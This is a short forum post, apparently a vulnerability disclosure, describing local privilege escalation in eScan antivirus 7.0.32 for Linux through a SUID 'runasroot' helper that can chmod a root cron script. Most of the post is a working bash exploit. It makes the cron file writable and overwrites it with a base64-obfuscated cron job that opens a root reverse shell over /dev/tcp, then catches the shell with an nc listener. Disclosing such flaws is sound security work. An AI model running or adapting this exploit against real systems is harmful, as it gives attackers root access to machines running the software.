Priv Esc in eScan antivirus 7.0.32

dmknght · June 21, 2023, 4:41am

Context:

This software has a file mwavupdate which is a crontab script. It creates a symlink to /etc/cron.d to make system run update using cronjob
runasroot is a SUID binary file that allows unprivileged user change permission of some certain files using chmod. The mwavupdate is in the list too
→ Attacker can change permission of mwavupdate, overwriting the crontab by a malicious task to execute system command as root

Exploit demo that gains reverse shell (localhost)

#!/bin/bash
# Modify permission of crontab
/opt/MicroWorld/sbin/runasroot chmod 777 /opt/MicroWorld/etc/mwavupdate
# Modify crontab to run malicious command
echo
"KiAqICogKiAqIHJvb3QgYmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTI3LjAuMC
4xLzg4ODggPCYxJwo=" | base64 -d > /opt/MicroWorld/etc/mwavupdate
/opt/MicroWorld/sbin/runasroot chmod 750 /opt/MicroWorld/etc/mwavupdate
nc -nvlp 8888

system · October 19, 2023, 4:41am

This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.